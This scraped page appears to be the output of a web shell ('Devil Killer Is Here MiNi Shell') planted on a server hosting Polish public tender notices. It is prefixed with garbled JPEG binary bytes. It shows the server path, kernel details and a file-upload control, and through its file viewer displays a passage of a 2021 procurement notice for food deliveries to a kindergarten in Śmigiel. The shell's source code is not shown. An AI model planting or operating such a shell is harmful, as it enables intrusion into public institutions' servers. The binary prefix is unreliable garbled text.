JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211201/0029423201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa żywności dla Przedszkola w Śmiglu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PRZEDSZKOLE W ŚMIGLU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000928877</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Bohaterów 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Śmigiel</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-030</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">655180109</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@przedszkole.smigiel.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">przedszkole.smigiel.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa żywności dla Przedszkola w Śmiglu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6cddf929-5284-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00294232</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00274607/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup i dostawa żywności dla Przedszkola w Śmiglu w 2022 r</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/przedszkole_smigiel <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/przedszkole_smigiel</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie zapytań, oświadczeń, wniosków, zawiadomień, jak również przekazywanie informacji odbywa się przy użyciu Platformy Zakupowej, dostępnej pod adresem https://platformazakupowa.pl/pn/przedszkole_smigiel.pll<br/>2.	Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej opisane zostały w:<br/>1)	„Regulaminie Internetowej Platformy zakupowej platformazakupowa.pl Open Nexus Sp. z o. o.” dostępnym pod adresem <br/>https://platformazakupowa.pl/strona/1-regulamin oraz <br/>2)	„Instrukcji dla wykonawców” dostępnej pod adresem <br/>https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje że: <br/>a)	administratorem Pani/Pana danych osobowych jest Dyrektor Przedszkola w Śmiglu z siedzibą w: Przedszkole w Śmiglu, Al. Bohaterów 7, 64-030 Śmigiel,<br/>b)	inspektorem ochrony danych osobowych w Przedszkolu w Śmiglu jest Pan Grzegorz Król, kontakt: gkrol@pharos.pl,<br/>c)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego <br/>pn. „Zakup i dostawa żywności dla Przedszkola w Śmiglu”, znak sprawy: <br/>PS-271.1.2021,<br/>d)	w niektórych sytuacjach Zamawiający może przekazywać Pani/Pana dane osobowe osobom trzecim, jeśli będzie to konieczne do dochodzenia praw i obowiązków wynikających z zawartej umowy lub obowiązujących przepisów prawa,<br/>e)	Pani/Pana dane osobowe będą przekazywane wyłącznie osobom upoważnionym przez Zamawiającego, tj. pracownikom i współpracownikom Zamawiającego, którzy muszą mieć dostęp do danych, aby wykonywać swoje obowiązki, podmiotom przetwarzającym, którym Zamawiający zleci to zadanie, innym odbiorcom danych, np. kurierom (placówkom pocztowym), bankom, ubezpieczycielom, kancelariom prawnym lub instytucjom upoważnionym z mocy prawa do otrzymania przedmiotowych danych,<br/>f)	odbiorcami Pani/Pana danych osobowych będą ponadto osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych,<br/>g)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy oraz przez okres wykonywania przez Zamawiającego ciążących na nim obowiązków prawnych, w którym przepisy prawa nakazują Zamawiającemu przechowywać dane osobowe, w którym Zamawiający może ponieść konsekwencje prawne niewykonania obowiązków wynikających <br/>z przepisów prawa oraz ustalenia, obrony i dochodzenia roszczeń oraz wierzytelności przez Zamawiającego,<br/>h)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP, <br/>i)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO,<br/>j)	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ,<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ,<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>k)	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PS-271.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest zakup i dostawa artykułów żywnościowych dla Przedszkola w Śmiglu, Al. Bohaterów 7, 64-030 Śmigiel na rok 2022.<br/>2.	Zamawiający zgodnie z pkt 2.6 SWZ dopuszcza możliwość składania ofert częściowych (podział na PAKIETY) według poniższych zasad:<br/>1)	PAKIET I – nabiał,<br/><br/>3.	Szczegółowy opis przedmiotu zamówienia przedstawiony został w Części III SWZ.<br/>4.	Zamówienie obejmuje sukcesywną dostawę do Przedszkola w Śmiglu poszczególnych artykułów spożywczych, których wykaz oraz szacowane ilości określone zostały <br/>w Części III SWZ – Opisie przedmiotu zamówienia oraz w Załączniku nr 4 (A-G) do SWZ – Formularzu Cenowym.<br/>5.	Zamawiający informuje, że ilości określone w Formularzu cenowym mają charakter szacunkowy i mogą ulec zmianie w trakcie trwania realizacji umowy. Podane ilości <br/>w Formularzu Cenowym – Załącznik nr 4 (A-G), należy przyjąć do skalkulowania ceny oferty w celu porównania ofert. Ostateczna ilość poszczególnych artykułów będzie wynikała z faktycznych potrzeb Zamawiającego.<br/>6.	Zamawiający zastrzega sobie prawo do nie wykorzystania w całości lub części przedmiotu zamówienia w czasie obowiązywania umowy. Jeżeli jego potrzeby rzeczywiste będą mniejsze od ilości określonej w przedmiocie zamówienia, Zamawiający ma prawo odstąpić od dalszych zakupów artykułów spożywczych bez jakichkolwiek konsekwencji finansowych i odszkodowań na rzecz Wykonawcy. <br/>7.	Wykonawca zobowiązuje się dostarczyć Zamawiającemu przedmiot zamówienia sukcesywnie, na podstawie zamówień określających asortyment i ilość.<br/>8.	Termin dostawy i ilość wybranych artykułów żywnościowych Zamawiający będzie uzgadniał każdorazowo z Wykonawcą telefonicznie.<br/>9.	Wykonawca zobowiązuje się do dostawy towaru zgodnie ze złożoną ofertą w ilościach i terminach określonych w SWZ i umowie.<br/>10.	Nie dopuszcza się stosowania zamienników o innych parametrach niż opisane <br/>w Formularzu cenowym.<br/>11.	Dostawy artykułów spożywczych objętych niniejszym postępowaniem Wykonawca wykona na własny koszt. Wykonanie dostawy obejmuje również czynności rozładunku i dostarczenie towaru do magazynów przedszkolnych wskazanych w umowie. Następnie upoważniony pracownik Zamawiającego potwierdza odbiór towaru.<br/>12.	Wykonawca gwarantuje, że dostarczone artykuły żywnościowe będą zgodne <br/>z obowiązującymi przepisami, w szczególności:<br/>1)	Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. <br/>z 2020 r., poz. 2021 ze zm.),<br/>2)	Rozporządzenia Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełnić środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w jednostkach (Dz. U. z 2016 r., poz. 1154),<br/>3)	Ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (t.j. Dz. U. z 2021 r., poz. 630),<br/>4)	Ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego <br/>(t.j. Dz. U. z 2020 r., poz. 1753),<br/>5)	Rozporządzenia Parlamentu Europejskiego i Rady (WE nr 1333/2008, WE nr 852/2004, WE nr 854/2004, WE 178/2002). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający oceni i porówna jedynie te oferty, które: <br/>1)	zostały złożone przez wykonawców spełniających warunki udziału w postępowaniu i nie podlegających wykluczeniu,<br/>2)	nie zostały odrzucone przez Zamawiającego. <br/><br/>2.	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria oceny ofert:<br/>1)	kryterium ceny – waga kryterium 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest zakup i dostawa artykułów żywnościowych dla Przedszkola w Śmiglu, Al. Bohaterów 7, 64-030 Śmigiel na rok 2022.<br/>2.	Zamawiający zgodnie z pkt 2.6 SWZ dopuszcza możliwość składania ofert częściowych (podział na PAKIETY) według poniższych zasad:<br/><br/>2)	PAKIET II – mięso i wędliny,<br/>3.	Szczegółowy opis przedmiotu zamówienia przedstawiony został w Części III SWZ.<br/>4.	Zamówienie obejmuje sukcesywną dostawę do Przedszkola w Śmiglu poszczególnych artykułów spożywczych, których wykaz oraz szacowane ilości określone zostały <br/>w Części III SWZ – Opisie przedmiotu zamówienia oraz w Załączniku nr 4 (A-G) do SWZ – Formularzu Cenowym.<br/>5.	Zamawiający informuje, że ilości określone w Formularzu cenowym mają charakter szacunkowy i mogą ulec zmianie w trakcie trwania realizacji umowy. Podane ilości <br/>w Formularzu Cenowym – Załącznik nr 4 (A-G), należy przyjąć do skalkulowania ceny oferty w celu porównania ofert. Ostateczna ilość poszczególnych artykułów będzie wynikała z faktycznych potrzeb Zamawiającego.<br/>6.	Zamawiający zastrzega sobie prawo do nie wykorzystania w całości lub części przedmiotu zamówienia w czasie obowiązywania umowy. Jeżeli jego potrzeby rzeczywiste będą mniejsze od ilości określonej w przedmiocie zamówienia, Zamawiający ma prawo odstąpić od dalszych zakupów artykułów spożywczych bez jakichkolwiek konsekwencji finansowych i odszkodowań na rzecz Wykonawcy. <br/>7.	Wykonawca zobowiązuje się dostarczyć Zamawiającemu przedmiot zamówienia sukcesywnie, na podstawie zamówień określających asortyment i ilość.<br/>8.	Termin dostawy i ilość wybranych artykułów żywnościowych Zamawiający będzie uzgadniał każdorazowo z Wykonawcą telefonicznie.<br/>9.	Wykonawca zobowiązuje się do dostawy towaru zgodnie ze złożoną ofertą w ilościach i terminach określonych w SWZ i umowie.<br/>10.	Nie dopuszcza się stosowania zamienników o innych parametrach niż opisane <br/>w Formularzu cenowym.<br/>11.	Dostawy artykułów spożywczych objętych niniejszym postępowaniem Wykonawca wykona na własny koszt. Wykonanie dostawy obejmuje również czynności rozładunku i dostarczenie towaru do magazynów przedszkolnych wskazanych w umowie. Następnie upoważniony pracownik Zamawiającego potwierdza odbiór towaru.<br/>12.	Wykonawca gwarantuje, że dostarczone artykuły żywnościowe będą zgodne <br/>z obowiązującymi przepisami, w szczególności:<br/>1)	Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. <br/>z 2020 r., poz. 2021 ze zm.),<br/>2)	Rozporządzenia Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełnić środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w jednostkach (Dz. U. z 2016 r., poz. 1154),<br/>3)	Ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (t.j. Dz. U. z 2021 r., poz. 630),<br/>4)	Ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego <br/>(t.j. Dz. U. z 2020 r., poz. 1753),<br/>5)	Rozporządzenia Parlamentu Europejskiego i Rady (WE nr 1333/2008, WE nr 852/2004, WE nr 854/2004, WE 178/2002). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający oceni i porówna jedynie te oferty, które: <br/>1)	zostały złożone przez wykonawców spełniających warunki udziału w postępowaniu i nie podlegających wykluczeniu,<br/>2)	nie zostały odrzucone przez Zamawiającego. <br/><br/>2.	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria oceny ofert:<br/>1)	kryterium ceny – waga kryterium 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest zakup i dostawa artykułów żywnościowych dla Przedszkola w Śmiglu, Al. Bohaterów 7, 64-030 Śmigiel na rok 2022.<br/>2.	Zamawiający zgodnie z pkt 2.6 SWZ dopuszcza możliwość składania ofert częściowych (podział na PAKIETY) według poniższych zasad:<br/><br/>3)	PAKIET III – owoce i warzywa,<br/>3.	Szczegółowy opis przedmiotu zamówienia przedstawiony został w Części III SWZ.<br/>4.	Zamówienie obejmuje sukcesywną dostawę do Przedszkola w Śmiglu poszczególnych artykułów spożywczych, których wykaz oraz szacowane ilości określone zostały <br/>w Części III SWZ – Opisie przedmiotu zamówienia oraz w Załączniku nr 4 (A-G) do SWZ – Formularzu Cenowym.<br/>5.	Zamawiający informuje, że ilości określone w Formularzu cenowym mają charakter szacunkowy i mogą ulec zmianie w trakcie trwania realizacji umowy. Podane ilości <br/>w Formularzu Cenowym – Załącznik nr 4 (A-G), należy przyjąć do skalkulowania ceny oferty w celu porównania ofert. Ostateczna ilość poszczególnych artykułów będzie wynikała z faktycznych potrzeb Zamawiającego.<br/>6.	Zamawiający zastrzega sobie prawo do nie wykorzystania w całości lub części przedmiotu zamówienia w czasie obowiązywania umowy. Jeżeli jego potrzeby rzeczywiste będą mniejsze od ilości określonej w przedmiocie zamówienia, Zamawiający ma prawo odstąpić od dalszych zakupów artykułów spożywczych bez jakichkolwiek konsekwencji finansowych i odszkodowań na rzecz Wykonawcy. <br/>7.	Wykonawca zobowiązuje się dostarczyć Zamawiającemu przedmiot zamówienia sukcesywnie, na podstawie zamówień określających asortyment i ilość.<br/>8.	Termin dostawy i ilość wybranych artykułów żywnościowych Zamawiający będzie uzgadniał każdorazowo z Wykonawcą telefonicznie.<br/>9.	Wykonawca zobowiązuje się do dostawy towaru zgodnie ze złożoną ofertą w ilościach i terminach określonych w SWZ i umowie.<br/>10.	Nie dopuszcza się stosowania zamienników o innych parametrach niż opisane <br/>w Formularzu cenowym.<br/>11.	Dostawy artykułów spożywczych objętych niniejszym postępowaniem Wykonawca wykona na własny koszt. Wykonanie dostawy obejmuje również czynności rozładunku i dostarczenie towaru do magazynów przedszkolnych wskazanych w umowie. Następnie upoważniony pracownik Zamawiającego 